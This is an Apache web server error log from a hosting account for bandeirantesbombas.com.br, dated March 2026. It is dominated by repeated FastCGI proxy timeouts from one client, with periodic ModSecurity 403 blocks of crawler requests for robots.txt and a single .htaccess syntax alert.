[Sun Mar 15 14:19:27.033822 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58716] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:19:48.144284 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:20:09.125807 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:59132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:20:30.141794 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:20:52.120864 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59560] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:21:13.128506 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59800] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:21:34.125795 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59988] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:21:56.125836 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60226] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:22:17.149799 2026] [proxy_fcgi:error] [pid 21805:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60470] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:22:18.244908 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.228.16:55338] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbqypqj1wV0Si-Okedy6QAAAAo"]
[Sun Mar 15 14:22:53.324274 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60782] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:23:15.107108 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60976] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:23:44.121805 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:32956] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:24:05.136278 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33206] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:24:27.121806 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33380] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:24:48.140826 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33538] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:25:09.129784 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33696] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:25:32.117826 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:33940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:25:43.692610 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.244.31:41458] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbrl7ABkC4fWIHEf8F-0QAAAFc"]
[Sun Mar 15 14:25:54.125792 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:26:16.126124 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34412] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:26:37.123385 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:34566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:26:58.089854 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34808] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:27:20.117796 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35180] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:27:41.761684 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.228.16:55620] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbsDZqj1wV0Si-Okedz3wAAAAg"]
[Sun Mar 15 14:27:42.557487 2026] [proxy_fcgi:error] [pid 21533:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:28:09.134076 2026] [proxy_fcgi:error] [pid 11972:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35706] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:28:37.117815 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:29:06.161914 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:29:27.109486 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:29:48.096371 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36892] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:30:09.045813 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37040] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:30:33.129773 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37278] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:30:44.435256 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.244.31:51984] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbsxJqj1wV0Si-Oked0PQAAABA"]
[Sun Mar 15 14:30:55.125808 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:31:16.125552 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37656] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:31:37.070211 2026] [proxy_fcgi:error] [pid 11972:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37840] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:32:00.121786 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38076] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:32:22.041823 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:38334] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:32:43.124197 2026] [proxy_fcgi:error] [pid 21805:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38486] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:32:47.046632 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.228.16:50018] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbtP7ABkC4fWIHEf8F_fAAAAE4"]
[Sun Mar 15 14:33:04.124401 2026] [proxy_fcgi:error] [pid 21946:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38664] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:33:32.125925 2026] [proxy_fcgi:error] [pid 21946:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:33:59.125843 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:34:28.145915 2026] [proxy_fcgi:error] [pid 21805:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39462] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:34:49.118455 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39644] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:35:10.254534 2026] [proxy_fcgi:error] [pid 21533:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39798] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:35:31.123997 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40048] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:35:54.133472 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40246] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:36:18.113228 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:40446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:36:19.504277 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.244.31:35426] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbuE5qj1wV0Si-Oked1GgAAABg"]
[Sun Mar 15 14:36:39.121249 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40748] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:37:00.121807 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41010] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:37:21.125837 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:41198] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:37:44.124136 2026] [proxy_fcgi:error] [pid 11972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:38:05.033947 2026] [proxy_fcgi:error] [pid 21805:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:38:10.703089 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.228.16:33442] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbugtSswJuvopo3lOj6OgAAAIQ"]
[Sun Mar 15 14:38:26.132561 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41810] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:38:48.135169 2026] [proxy_fcgi:error] [pid 21805:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:39:21.129981 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42322] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:39:49.149787 2026] [proxy_fcgi:error] [pid 21806:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42552] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:40:11.073849 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:42742] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:40:33.121817 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42884] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:40:54.133804 2026] [proxy_fcgi:error] [pid 11972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:43058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:41:16.125909 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43208] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:41:38.125183 2026] [proxy_fcgi:error] [pid 21805:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:43524] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:42:00.069827 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43730] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:42:23.121780 2026] [proxy_fcgi:error] [pid 21946:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:43904] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:42:24.759534 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.244.31:42218] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbvgLABkC4fWIHEf8GALgAAAFU"]
[Sun Mar 15 14:42:45.062063 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:43:07.137803 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:44260] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:43:16.409071 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.228.16:34320] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbvtLABkC4fWIHEf8GARQAAAFg"]
[Sun Mar 15 14:43:28.129769 2026] [proxy_fcgi:error] [pid 11972:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44464] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:43:50.127790 2026] [proxy_fcgi:error] [pid 21806:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44688] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:44:12.130284 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:44:43.033952 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:45218] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:45:10.129914 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45456] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:45:33.126923 2026] [proxy_fcgi:error] [pid 21946:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:45660] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:45:55.139334 2026] [proxy_fcgi:error] [pid 21806:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45896] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:46:17.121784 2026] [proxy_fcgi:error] [pid 21946:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:46:27.641170 2026] [mime_magic:error] [pid 11972:tid 140411733534464] (70014)End of file found: [client 66.249.74.169:44097] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Sun Mar 15 14:46:38.077836 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:47:01.130062 2026] [proxy_fcgi:error] [pid 21946:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46416] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:47:23.061848 2026] [proxy_fcgi:error] [pid 21946:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:46572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:47:45.130788 2026] [proxy_fcgi:error] [pid 21533:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46698] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:48:06.138287 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46824] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:48:27.097835 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46940] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:48:33.108785 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.244.31:36666] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbw8XjZBu2q05ozVU_o4wAAAUQ"]
[Sun Mar 15 14:48:34.144390 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.228.16:37914] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbw8pqj1wV0Si-Oked2YgAAABg"]
[Sun Mar 15 14:48:54.127799 2026] [proxy_fcgi:error] [pid 21805:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:49:20.045850 2026] [proxy_fcgi:error] [pid 21806:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:49:41.134130 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47608] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:50:02.154836 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:47786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:50:32.129899 2026] [proxy_fcgi:error] [pid 21533:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:50:55.129848 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48272] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:51:16.120585 2026] [proxy_fcgi:error] [pid 21533:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48454] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:51:37.129765 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48602] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:51:58.131567 2026] [proxy_fcgi:error] [pid 21946:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:48736] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:52:20.125799 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48958] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:52:30.751879 2026] [core:alert] [pid 21805:tid 140411624429312] [client 66.249.74.169:45539] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Sun Mar 15 14:52:41.125899 2026] [proxy_fcgi:error] [pid 21533:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:49086] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:53:02.133838 2026] [proxy_fcgi:error] [pid 21533:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49248] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:53:23.125519 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:53:39.290716 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.244.31:33056] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbyI3bQATo66fKoS7zdKgAAAMA"]
[Sun Mar 15 14:53:44.127563 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49572] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:53:44.713160 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.228.16:46816] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbyKNSswJuvopo3lOj7aQAAAI8"]
[Sun Mar 15 14:54:05.141828 2026] [proxy_fcgi:error] [pid 11972:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49734] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:54:27.133814 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:49870] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:54:48.127648 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49978] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:55:10.137808 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50096] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:55:31.121809 2026] [proxy_fcgi:error] [pid 21533:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:55:54.125768 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:56:17.124748 2026] [proxy_fcgi:error] [pid 21946:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50600] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:56:38.152259 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:57:00.135845 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50916] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:57:22.061950 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51038] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:57:44.131282 2026] [proxy_fcgi:error] [pid 21946:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51172] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:58:05.141890 2026] [proxy_fcgi:error] [pid 21946:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51296] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:58:27.129817 2026] [proxy_fcgi:error] [pid 21806:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51440] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:58:48.069982 2026] [proxy_fcgi:error] [pid 21806:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:51588] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:59:04.315627 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.244.31:37478] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbzaLABkC4fWIHEf8GBgAAAAEM"]
[Sun Mar 15 14:59:09.129859 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51740] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:59:10.513060 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.228.16:53756] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abbzbtSswJuvopo3lOj8BQAAAI4"]
[Sun Mar 15 14:59:30.125825 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51896] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 14:59:51.045810 2026] [proxy_fcgi:error] [pid 21946:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52050] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:00:13.058996 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:52166] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:00:34.138679 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:52354] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 15:00:55.144039 2026] [proxy_fcgi:error] [pid 21806:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52516] AH01075: Error dispatching request to : (polling)
